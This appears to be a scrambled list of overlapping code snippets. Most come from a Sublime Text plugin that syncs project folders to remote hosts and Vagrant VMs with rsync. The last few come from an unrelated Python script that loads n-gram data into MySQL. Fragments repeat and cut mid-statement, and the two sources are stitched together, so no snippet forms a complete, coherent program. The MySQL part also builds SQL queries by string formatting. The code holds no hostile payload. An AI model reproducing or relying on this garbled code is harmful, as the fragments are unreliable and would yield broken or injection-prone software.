"def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) == 0: do_it(\"\", \"\") return True",
"remote.sync_api as sync_api import remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default",
"found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a remote",
"import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api",
"w = sublime.active_window() found = sublime_api.project_by_path(w, filename) if found is None: return False",
"sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is",
"below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\") return False",
"directory to a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def",
"do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w,",
"a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From",
"do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None:",
"not None: callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w, path) if found is",
"rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local path\", path) w = sublime.active_window() def",
"AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to a local project path.\"\"\" def run(self,",
"new remote path to a local project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda:",
"sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\":",
"sshOptions != \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\":",
"settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings)",
"settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is not",
"local change out.\"\"\" def on_post_save_async(self, view): filename = view.file_name() w = sublime.active_window() found",
"(c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text 3 commands",
"userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote path you entered does not\" +",
"class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to a remote directory.\"\"\" def run(self, edit,",
"path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local",
"\"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def on_post_save_async(self, view):",
"remote.sublime_api as sublime_api import remote.sync_api as sync_api import remote.vagrant_api as vagrant_api # =============================================================================",
"= sublime_api.project_by_path(w, path) if found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda",
"print(\"From local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if found",
"!= \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None, None)",
"sublime_api.error_message(\"No vagrant VMs found\") return False if len(vms) == 3: done_with_vm(userInput, vms, 2)",
"============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\" def run(self, edit, paths):",
"return True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback",
"sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found is not None and found[\"rsyncOptions\"] !=",
"0: do_it(\"\", \"\") return True parts = userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The",
"project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback):",
"# Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text",
"!= \"\": do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions}",
"\"\") return True def done_with_vm(remotePath, vms, userSelection): if userSelection == -1: return False",
"done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\")",
"True do_it(userInput) return True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings)",
"parts = userInput.split(\":\") if len(parts) != 2: sublime_api.error_message(\"The remote path you entered does",
"for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback):",
"False more = parts[0].split(\"@\") host = \"\" if len(more) > 2: sublime_api.error_message(\"Unable to",
"path\", path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0:",
"else: host = more[0] if host == \"vagrant\": vms = [\"Select VM below...\",",
"RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0],",
"i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return True def done_with_vm(remotePath, vms, userSelection):",
"from_remote_async(path): print(\"From local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if",
"sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync",
"found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory to",
"sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\",",
"sublime_api.project_by_path(w, path) if found is not None and found[\"rsyncOptions\"] != \"\": options =",
"callback): print(\"Local path\", path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput)",
"not None: callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found is",
"found is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename, found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"),",
"len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\") return False if len(vms) == 3:",
"\"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return",
"vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\") return False if len(vms)",
"return True def done_with_vm(remotePath, vms, userSelection): if userSelection == -1: return False vm",
"if len(parts) != 2: sublime_api.error_message(\"The remote path you entered does not\" + \"",
"paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\", path) w = sublime.active_window()",
"def rsync_options(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput)",
"utf-8 -*- # # Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements",
"add_remote_async(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput)",
"import sublime import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api",
"if callback is not None: callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w, path)",
"o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\"))",
"if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\") return False if len(vms) ==",
"add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"), path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True",
"lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\",",
"== -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False",
"len(more) == 2: host = more[1] else: host = more[0] if host ==",
"path\", path) w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) ==",
"found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\")))",
"if found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\",",
"options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options, done_with_options, None, None) # =============================================================================",
"= sublime_api.project_by_path(w, path) if found is not None and found[\"remotePath\"] != \"\": remotePath",
"return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener):",
"w = sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) == 0: do_it(\"\",",
"is not None and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync",
"found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def on_post_save_async(self,",
"more[0] if host == \"vagrant\": vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if",
"= sublime.active_window() found = sublime_api.project_by_path(w, path) if found is None or found[\"remotePath\"] ==",
"run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local path\", path)",
"commands provided by remote.\"\"\" import os import re import sys import sublime import",
"do_it(remotePath, sshOptions) def do_it(remotePath, sshOptions): settings = {\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path,",
"do_it(userInput) return True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if",
"path, o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\",",
"sublime import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import",
"remote path you\" + \" entered\") return False elif len(more) == 2: host",
"if len(userInput) == 0: do_it(\"\", \"\") return True parts = userInput.split(\":\") if len(parts)",
"[\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\")",
"return False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions",
"rsync options:\", options, done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new",
"0) def rsync_options(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\",",
"filename = view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w, filename) if found is",
"# -*- coding: utf-8 -*- # # Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE",
"vms, userSelection): if userSelection == -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm",
"sublime_api.project_by_path(w, path) if found is not None and found[\"remotePath\"] != \"\": remotePath =",
"def to_remote_async(path): print(\"To local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path)",
"do_it(userInput, \"\") return True def done_with_vm(remotePath, vms, userSelection): if userSelection == -1: return",
"a new remote path to a local project path.\"\"\" def run(self, edit, paths):",
"import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api as sync_api",
"= parts[0].split(\"@\") host = \"\" if len(more) > 2: sublime_api.error_message(\"Unable to parse the",
"= vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False print(\"VM selected\", vm) sshOptions =",
"sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if sshOptions != \"\": do_it(remotePath, sshOptions) def",
"sys import sublime import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as",
"{\"remotePath\": remotePath, \"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings)",
"import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api as sync_api import remote.vagrant_api",
"None), 0) def rsync_options(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_options(userInput):",
"found = sublime_api.project_by_path(w, path) if found is None or found[\"remotePath\"] == \"\": add_remote_async(path,",
"\"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True",
"\"\"\"Sync a local directory from a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda:",
"vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\" def run(self,",
"= more[1] else: host = more[0] if host == \"vagrant\": vms = [\"Select",
"found = sublime_api.project_by_path(w, path) if found is not None and found[\"rsyncOptions\"] != \"\":",
"import os import re import sys import sublime import sublime_plugin import subprocess import",
"by remote.\"\"\" import os import re import sys import sublime import sublime_plugin import",
"import re import sys import sublime import sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__)))",
"3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput,",
"path) if found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(",
"============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to a local project path.\"\"\"",
"2: sublime_api.error_message(\"Unable to parse the remote path you\" + \" entered\") return False",
"\"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change",
"path to a local project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None),",
"w = sublime.active_window() found = sublime_api.project_by_path(w, path) if found is None or found[\"remotePath\"]",
"None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename, found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\"))",
"local directory from a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0)",
"if callback is not None: callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path)",
"= {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) options",
"to_remote_async(path): print(\"To local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if",
"= sublime.active_window() def done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) == 0: do_it(\"\", \"\")",
"sublime_api.error_message(\"Unable to parse the remote path you\" + \" entered\") return False elif",
"\"\"\"Sync a local directory to a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda:",
"local directory to a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0)",
"vagrant VMs found\") return False if len(vms) == 3: done_with_vm(userInput, vms, 2) else:",
"options, done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path",
"return False if len(vms) == 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1:",
"return True return sync_api.rsync_remote(found.get(\"remotePath\", \"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # =============================================================================",
"local path\", path) w = sublime.active_window() found = sublime_api.project_by_path(w, path) if found is",
"sublime.active_window() found = sublime_api.project_by_path(w, path) if found is None or found[\"remotePath\"] == \"\":",
"return False more = parts[0].split(\"@\") host = \"\" if len(more) > 2: sublime_api.error_message(\"Unable",
"= view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w, filename) if found is None:",
"w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return",
"= more[0] if host == \"vagrant\": vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms)",
"path, settings) if callback is not None: callback(settings) remotePath = \"\" found =",
"lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return True def done_with_vm(remotePath, vms,",
"found = sublime_api.project_by_path(w, path) if found is not None and found[\"remotePath\"] != \"\":",
"host = more[0] if host == \"vagrant\": vms = [\"Select VM below...\", \"---\"]",
"import remote.sync_api as sync_api import remote.vagrant_api as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override",
"VMs found\") return False if len(vms) == 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms,",
"sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) remotePath = \"\"",
"callback(settings) remotePath = \"\" found = sublime_api.project_by_path(w, path) if found is not None",
"True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is",
"+ \" appear to contain a host\") return False more = parts[0].split(\"@\") host",
"host = \"\" if len(more) > 2: sublime_api.error_message(\"Unable to parse the remote path",
"class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def on_post_save_async(self, view): filename = view.file_name()",
"True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class",
"return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if vm is None: return False print(\"VM selected\",",
"sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync",
"found is not None and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these",
"return False elif len(more) == 2: host = more[1] else: host = more[0]",
"path) if found is not None and found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"]",
"\"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"), found.get(\"remotePath\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) #",
"is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\",",
"# ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def on_post_save_async(self, view): filename",
"module implements the Sublime Text 3 commands provided by remote.\"\"\" import os import",
"as vagrant_api # ============================================================================= class RsyncOptionsCommand(sublime_plugin.TextCommand): \"\"\"Override default rsync options for Remote.\"\"\" def",
"Text 3 commands provided by remote.\"\"\" import os import re import sys import",
"appear to contain a host\") return False more = parts[0].split(\"@\") host = \"\"",
"out.\"\"\" def on_post_save_async(self, view): filename = view.file_name() w = sublime.active_window() found = sublime_api.project_by_path(w,",
"def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local path\",",
"None: return False print(\"VM selected\", vm) sshOptions = vagrant_api.get_ssh_options(vm) print(\"ssh options\", sshOptions) if",
"== \"vagrant\": vms = [\"Select VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2:",
"None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a remote directory.\"\"\"",
"threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api as sync_api import remote.vagrant_api as",
"\"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class RemoteEdit(sublime_plugin.EventListener): \"\"\"Sync a local change out.\"\"\" def",
"3 commands provided by remote.\"\"\" import os import re import sys import sublime",
"remote path to a local project path.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0],",
"userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def do_it(rsyncOptions):",
"run(self, edit, paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local path\", path)",
"2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text 3 commands provided",
"rsync options for Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def",
"remote folder:\", remotePath, done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local",
"len(userInput) == 0: do_it(\"\", \"\") return True parts = userInput.split(\":\") if len(parts) !=",
"to contain a host\") return False more = parts[0].split(\"@\") host = \"\" if",
"== 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else:",
"rsync_options(path, callback): print(\"Local path\", path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if",
"def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions} sublime_api.update_project_settings(w, path, settings) if callback is not",
"you\" + \" entered\") return False elif len(more) == 2: host = more[1]",
"# http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime Text 3 commands provided by remote.\"\"\"",
"\"\"), found.get(\"path\", \"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a",
"if found is not None and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use",
"= sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found is not None and found[\"rsyncOptions\"]",
"sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath, done_with_folder, None, None) # ============================================================================= class",
"done_with_folder(userInput): print(\"Remote path\", userInput) if len(userInput) == 0: do_it(\"\", \"\") return True parts",
"found[\"remotePath\"] != \"\": remotePath = found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath,",
"directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\",",
"done_with_vm(remotePath, vms, userSelection): if userSelection == -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection]) if",
"None and found[\"rsyncOptions\"] != \"\": options = found[\"rsyncOptions\"] sublime_api.show_input_panel(\"Use these rsync options:\", options,",
"0: do_it(sync_api.default_rsync_options()) return True do_it(userInput) return True def do_it(rsyncOptions): settings = {\"rsyncOptions\": rsyncOptions}",
"class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory from a remote directory.\"\"\" def run(self, edit,",
"2: sublime_api.error_message(\"No vagrant VMs found\") return False if len(vms) == 3: done_with_vm(userInput, vms,",
"os import re import sys import sublime import sublime_plugin import subprocess import threading",
"def done_with_vm(remotePath, vms, userSelection): if userSelection == -1: return False vm = vagrant_api.parse_vm_id(vms[userSelection])",
"\"\"), found.get(\"remoteOptions\", \"\"), found.get(\"rsyncOptions\", \"\")) # ============================================================================= class ToRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory",
"to parse the remote path you\" + \" entered\") return False elif len(more)",
"\"\"\"Map a new remote path to a local project path.\"\"\" def run(self, edit,",
"parts[0].split(\"@\") host = \"\" if len(more) > 2: sublime_api.error_message(\"Unable to parse the remote",
"coding: utf-8 -*- # # Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module",
"callback(settings) options = sync_api.default_rsync_options() found = sublime_api.project_by_path(w, path) if found is not None",
"# # Copyright (c) 2014 <NAME> # http://github.com/devaos/sublime-remote/blob/master/LICENSE \"\"\"This module implements the Sublime",
"sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local path\", path) w = sublime.active_window()",
"Remote.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0) def rsync_options(path, callback): print(\"Local",
"paths): sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0) def add_remote_async(path, callback): print(\"Local path\", path) w =",
"done_with_options, None, None) # ============================================================================= class AddRemoteCommand(sublime_plugin.TextCommand): \"\"\"Map a new remote path to",
"folder:\", remotePath, done_with_folder, None, None) # ============================================================================= class FromRemote(sublime_plugin.TextCommand): \"\"\"Sync a local directory",
"= sublime_api.project_by_path(w, filename) if found is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"), filename,",
"a remote directory.\"\"\" def run(self, edit, paths): sublime.set_timeout_async(lambda: to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To",
"host\") return False more = parts[0].split(\"@\") host = \"\" if len(more) > 2:",
"= found[\"remotePath\"] sublime_api.show_input_panel(\"Sync this folder to remote folder:\", remotePath, done_with_folder, None, None) #",
"path) w = sublime.active_window() def done_with_options(userInput): print(\"Options\", userInput) if len(userInput) == 0: do_it(sync_api.default_rsync_options())",
"\"remoteOptions\": sshOptions} sublime_api.update_project_settings(w, path, settings) if callback is not None: callback(settings) remotePath =",
"sublime_plugin import subprocess import threading sys.path.append(os.path.dirname(os.path.abspath(__file__))) import remote.sublime_api as sublime_api import remote.sync_api as",
"else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput, vms, i)) else: do_it(userInput, \"\") return True def",
"found is None or found[\"remotePath\"] == \"\": add_remote_async(path, lambda o: sync_api.rsync_remote( o.get(\"remotePath\", \"\"),",
"to_remote_async(paths[0]), 0) def to_remote_async(path): print(\"To local path\", path) w = sublime.active_window() found =",
"o: sync_api.rsync_remote(path, o.get(\"remotePath\", \"\"), o.get(\"remoteOptions\", \"\"), o.get(\"rsyncOptions\", \"\"))) return True return sync_api.rsync_remote(found.get(\"path\", \"\"),",
"sublime.set_timeout_async(lambda: from_remote_async(paths[0]), 0) def from_remote_async(path): print(\"From local path\", path) w = sublime.active_window() found",
"found = sublime_api.project_by_path(w, filename) if found is None: return False return sync_api.rsync_remote_file(found.get(\"path\", \"\"),",
"\"\" found = sublime_api.project_by_path(w, path) if found is not None and found[\"remotePath\"] !=",
"False if len(vms) == 3: done_with_vm(userInput, vms, 2) else: sublime_api.show_quick_panel(vms, lambda i=-1: done_with_vm(userInput,",
"VM below...\", \"---\"] vagrant_api.get_vm_list(vms) if len(vms) == 2: sublime_api.error_message(\"No vagrant VMs found\") return"
] |
[
"db='n_grams', # charset='utf8') # cursor = db.cursor() # ngram_stop = 622009+5 # count",
"# if count > (622009+5): # break # if count >=6 and count",
"# ngram_1 # try: # db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root', #",
"ngram_1 # try: # db = pymysql.connect(host='127.0.0.1', # port=3306, # user='root', # password='<PASSWORD>',",
"<= (622009+5): # ngram_2 try: db = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8')",
"ngram2_under_word, ngram2_after_word, ngram2_possibility,punishment ) VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception as",
"= db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in file: count",
"charset='utf8') # cursor = db.cursor() # ngram_stop = 622009+5 # count = 0",
"after_word, possibility, punishment) cursor.execute(sql) except Exception as ex: db.rollback() traceback.print_exc() finally: db.commit() cursor.close()",
"VALUES (\"%s\",\"%s\",\"%s\",\"%s\");'%(under_word, after_word, possibility, punishment) cursor.execute(sql) except Exception as ex: db.rollback() traceback.print_exc() finally:",
"pymysql.connect(host='127.0.0.1', port=3306, user='root', password='<PASSWORD>', db='n_grams', charset='utf8') cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered')",
"count +1 if count >=622017 and count <= 213054597: content = line.split('\\t') possibility",
"charset='utf8') cursor = db.cursor() count =0 with open('/home/fourier/Data/processed_file/data/GoogleWbi-Direct_Filtered') as file: for line in",
"import main import traceback import pymysql if __name__ == \"__main__\": # # ngram_1",
"= count +1 if count >=622017 and count <= 213054597: content = line.split('\\t')",
